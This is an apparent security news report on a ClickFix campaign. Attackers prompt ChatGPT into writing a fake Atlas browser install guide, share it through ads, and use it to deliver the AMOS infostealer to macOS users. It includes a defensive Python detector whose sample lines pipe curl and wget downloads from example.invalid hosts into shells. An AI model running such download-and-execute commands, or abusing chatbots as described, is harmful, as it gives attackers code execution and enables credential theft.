Infostealers have become 2025’s fastest-growing cyberthreat, targeting all operating systems and regions with sophisticated social engineering tactics.
In a new campaign discovered by Kaspersky experts, attackers are exploiting users’ interest in OpenAI’s Atlas browser by leveraging the official ChatGPT website itself as a hosting platform for malicious installation guides.
The attack begins with paid search advertisements on Google. When searching for “chatgpt atlas,” the first sponsored result appears to link to the official chatgpt.com domain, titled “ChatGPT Atlas for macOS – Download ChatGPT Atlas for Mac.” This creates an illusion of legitimacy that convinces users to click the malicious link.
However, clicking the advertisement actually directs users to a shared ChatGPT conversation published using the platform’s Share feature.
The attackers weaponized prompt engineering to force ChatGPT to generate a convincing installation guide, then sanitized their preceding dialogue to avoid raising suspicion.
Less tech-savvy users may accept these as legitimate instructions without realizing they’re reading a public conversation rather than official documentation.
This technique exploits a growing pattern of attackers abusing legitimate services that allow content sharing on their own domains.
Previous campaigns have misused Dropbox, Google Docs, GitHub, GitLab, and Google Forms. Now, the ability to share AI chatbot conversations provides another vector for distributing malicious content while maintaining a veneer of trustworthiness.
The ClickFix Trap
The installation guide instructs users to execute a single line of code in Terminal, a variation of the ClickFix attack technique.
The command downloads a malicious script from atlas-extension.com and immediately executes it.
While many users know better than to run executable files from suspicious sources, this method obscures the true nature of what’s happening: users believe they’re installing software, not launching code.
Once executed, the script requests the user’s system password. It validates the credentials by checking whether the username and password combination works for running system commands.
If incorrect, the prompt repeats indefinitely. If correct, the script downloads and installs the actual malware payload.
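The download-and-execute one-liner at the heart of this ClickFix variant leaves a recognisable shape in shell history or process telemetry: a downloader whose output is piped straight into a shell. The following triage helper is an added example, not Kaspersky’s or the article’s own code; the command lines it inspects are constructed (using example.invalid hosts), not samples from the campaign.

```python
import re
import shlex

# Constructed sample command lines, as a defender might pull them from
# shell history or endpoint telemetry. None are taken from the campaign.
SAMPLE_COMMANDS = [
    "curl -fsSL https://example.invalid/install.sh | bash",
    "brew install --cask some-browser",
    "echo aW5zdGFsbA== | base64 -d | sh",
    "wget -qO- http://example.invalid/a.sh | zsh",
    "ls -la ~/Downloads",
    'bash -c "$(curl -fsSL https://example.invalid/setup)"',
]

DOWNLOADERS = {"curl", "wget"}
SHELLS = {"sh", "bash", "zsh", "ksh", "dash"}
DECODERS = {"base64", "xxd", "openssl"}


def _first_word(segment):
    """Return the command name of one pipeline segment ('' if unparsable)."""
    try:
        words = shlex.split(segment)
    except ValueError:
        return ""
    return words[0].rsplit("/", 1)[-1] if words else ""


def classify_command(cmd):
    """Return the ClickFix-style indicators found in a single command line."""
    indicators = []
    names = [_first_word(s) for s in cmd.split("|")]
    # Download-and-execute: a downloader whose output later reaches a shell.
    for i in range(len(names) - 1):
        if names[i] in DOWNLOADERS and any(n in SHELLS for n in names[i + 1:]):
            indicators.append("pipe-download-to-shell")
            break
    # Obfuscated payload: a decoder whose output later reaches a shell.
    for i in range(len(names) - 1):
        if names[i] in DECODERS and any(n in SHELLS for n in names[i + 1:]):
            indicators.append("decode-to-shell")
            break
    # Remote content executed via command substitution: bash -c "$(curl ...)"
    if re.search(r"(\$\(|`)\s*(curl|wget)\b", cmd):
        indicators.append("remote-command-substitution")
    return indicators


def triage(commands):
    """Map each suspicious command to its indicators; benign lines are dropped."""
    return {c: classify_command(c) for c in commands if classify_command(c)}
```

Run against SAMPLE_COMMANDS, `triage` flags the four download-and-execute lines and leaves the brew and ls commands alone.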
AMOS Infostealer
Successful exploitation deploys AMOS (Atomic macOS Stealer), a sophisticated infostealer capable of harvesting extensive sensitive data including passwords and cookies from Chrome, Firefox, and other browsers.
It also targets crypto wallets like Electrum, Coinomi, and Exodus, alongside data from applications such as Telegram Desktop and OpenVPN Connect.
The malware further steals files with TXT, PDF, and DOCX extensions from the Desktop, Documents, and Downloads folders, as well as from the Notes application.
Beyond data exfiltration, AMOS installs a persistent backdoor configured to launch automatically upon system reboot, granting attackers remote control capabilities.
Users should deploy reliable anti-malware protection across all devices, particularly macOS systems.
Never execute commands from unsolicited sources, regardless of how legitimate they appear. When encountering suspicious installation guides, either immediately close the website or have the commands evaluated by an AI chatbot before proceeding.
This attack demonstrates that AI tools have become primary targets for social engineering, requiring heightened vigilance from users unfamiliar with these technologies.
